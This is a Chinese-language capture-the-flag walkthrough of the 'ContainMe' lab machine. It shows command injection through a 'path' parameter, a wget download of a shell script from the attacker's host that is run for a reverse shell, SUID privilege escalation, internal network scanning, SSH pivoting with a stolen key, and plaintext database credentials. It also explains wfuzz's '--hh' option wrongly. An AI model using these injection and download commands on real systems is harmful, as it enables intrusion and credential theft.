Vulnhub系列靶机-THM-ContainMe-v4

Vulnhub系列靶机-THM-ContainMe-v4

1. 信息收集

1.1 主机扫描

arp-scan -l
1

1.2 端口扫描

nmap -A -p- 192.168.188.188
1

端口扫描出来了：22，80，2222，8022。

访问Web页面

查看发现没有什么有用的信息。

1.3 目录爆破

dirsearch -u http://192.168.188.188 -e * -i 200
1

扫描出来四个目录，挨个查看一下。

查看info.php页面。

index.php页面。

查看index.php的页面源代码。

2. 漏洞探测

使用工具wfuzz测试

wfuzz -u "http://192.168.188.188/index.php?FUZZ=aaa" -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 329
1

wfuzz是一款用于Web应用程序模糊测试的开源工具，它可以帮助用户识别Web应用中存在的漏洞和安全问题。

使用wfuzz进行Web应用扫描的基本步骤如下：

1. 确定目标URL或IP地址。
2. 构建字典文件或下载现成的字典文件。
3. 运行wfuzz并指定扫描参数，如目标URL、字典文件等。
4. 分析扫描结果，识别存在的漏洞和安全问题。
5. 根据扫描结果进行修复和加固。

命令解析：

• wfuzz：命令行中执行wfuzz工具。
• -u "http://192.168.188.188/index.php?FUZZ=aaa"：指定了目标URL。FUZZ是一个占位符，wfuzz将使用字典中的每个词替换它，aaa是初始的替换值。这个命令将测试以http://192.168.188.188/index.php?FUZZ=形式的URL。
• -w /usr/share/seclists/Discovery/Web-Content/common.txt：设置字典文件的路径。这里使用了/usr/share/seclists/Discovery/Web-Content/common.txt作为字典文件。该字典文件包含了一些常见的Web路径和文件名。
• --hh 329：提示wfuzz在响应正文中寻找特定的字符串。329是用于匹配的字符串，如果找到它，wfuzz会将该响应认为是有效的。

详细解析：通过执行此命令，wfuzz将发送HTTP请求到目标URL，并使用字典文件中的词进行模糊测试。具体来说，它会将字典中的每个词替换掉占位符FUZZ，然后发送请求。如果响应中包含字符串329，那么wfuzz会将其认为是一个有效的响应。

检测到了path参数，将其拼接在路径后面并添加参数进行测试。

发现我们拼接的参数执行了，试着查看etc下的passwd文件。

http://192.168.188.188/index.php?path=/;cat%20/etc/passwd
1

命令执行漏洞。

3. 漏洞利用

既然命令可以执行，那么我们尝试写入shell脚本。

kali中开启http服务

python3 -m http.server 1234
1

然后浏览器访问路径。

注意：这里将文件下载到tmp目录下，因为其他的目录没有写入的权限。

http://192.168.188.188/index.php?path=aaa;wget%20-P%20/tmp%20http://192.168.188.157:1234/shell.sh
1

查看我们的shell文件是否写入

http://192.168.188.188/index.php?path=aaa;ls%20-al%20/tmp
1

文件写入成功。

执行该脚本文件，首先在kali中监听9999端口

然后执行脚本文件

http://192.168.188.188/index.php?path=aaa;bash%20/tmp/shell.sh
1

反弹成功

之前在查看etc下的passwd文件的时候有一个mike用户，到该用户的目录下面查看是否有有用的信息。

发现一个1cryptup文件，尝试执行。

./1cryptupx
1

但是现在所看到的用户权限太低了，进行提权。

4. 权限提升

使用find命令进行提权

find / -perm -4000 2>/dev/null
1

发现了/usr/share/man/zh_TW/crypt。

进入到指定的目录，然后执行相应的文件。

执行后发现已经是root权限了，但是Id依然显示的是www-data用户。但是这是一个残废的shell。

使用python3来获取完整的终端环境

python3 -c 'import pty;pty.spawn("/bin/bash")'
1

命令解析：

• python3 -c：这是在命令行中运行 Python 3 解释器，并通过 -c 选项提供即时执行 Python 代码的能力。
• 'import pty;pty.spawn("/bin/bash")'：这是传递给 Python 解释器的代码字符串。它导入了 pty 模块并调用 spawn() 函数来创建一个伪终端并执行 /bin/bash 命令。
  • import pty：这是导入 pty 模块，pty 是一个用于处理伪终端（pseudo-terminal）的模块，它提供了一种在程序中控制终端会话的方法。
  • pty.spawn("/bin/bash")：这是调用 spawn() 函数来创建一个伪终端并执行 /bin/bash 命令。
  • spawn()：该函数接受一个要执行的命令作为参数，并将当前程序的标准输入、输出以及错误连接到创建的伪终端。这样做可以实现交互式的终端会话，允许用户与 /bin/bash 命令进行交互，就像在终端中直接执行一样。

查看网络接口

ifconfig
1

发现我们在docker容器内。

扫描接口是否还有其他主机

for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5 >/dev/null && echo "172.16.20.$i" &) ;done
1

命令解析：

• Bash 命令，用于对 IP 地址范围进行 Ping 测试，并将能够成功 Ping 通的 IP 地址打印出来。

发现了172.16.20.2和172.16.20.6两个IP地址。

扫描还有哪些端口

for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open
1
2
3
4

命令解析：

• 该命令用于扫描指定 IP 地址上的所有端口，并输出开放的端口号。
• /dev/tcp/172.16.20.6/$port 是特殊的路径，它允许 Bash 通过创建一个与指定 IP 地址和端口相关联的文件描述符来模拟与该主机的 TCP 连接。

发现仅开启了一个22端口。

但是之前在mike用户的目录下还发现了.ssh 的文件，查看里面有什么。

id_rsa是私钥文件的名称。

ssh除了密码登录，尝试利用mike用户的密钥登录

ssh mike@172.16.20.6 -i id_rsa        #-i 指定连接文件
1

这个命令用于通过SSH协议连接到远程主机。解析：

• ssh：在命令行中执行SSH客户端工具。
• mike@172.16.20.6：指定要连接的远程主机的用户名和IP地址。mike是用户名，172.16.20.6是目标主机的IP地址。
• -i id_rsa：使用指定的私钥文件进行身份验证。id_rsa是私钥文件的名称。

连接成功

检查一下有哪些服务是开启着的

ss -ntlp
1

说明：ss -ntlp 是一个 Linux 命令，用于列出当前系统上所有处于监听状态的 TCP 端口和相应的进程信息。

mysql的3306端口是开放的。

使用弱密码password登录。

连接成功。

获取用户名和密码

root bjsig4868fgjjeog
mike WhatAreYouDoingHere
1
2

退出mysql，切换为root用户

进入到root目录下发现有个压缩文件

利用unzip解压，解压完成后发现flag在里头

通关成功！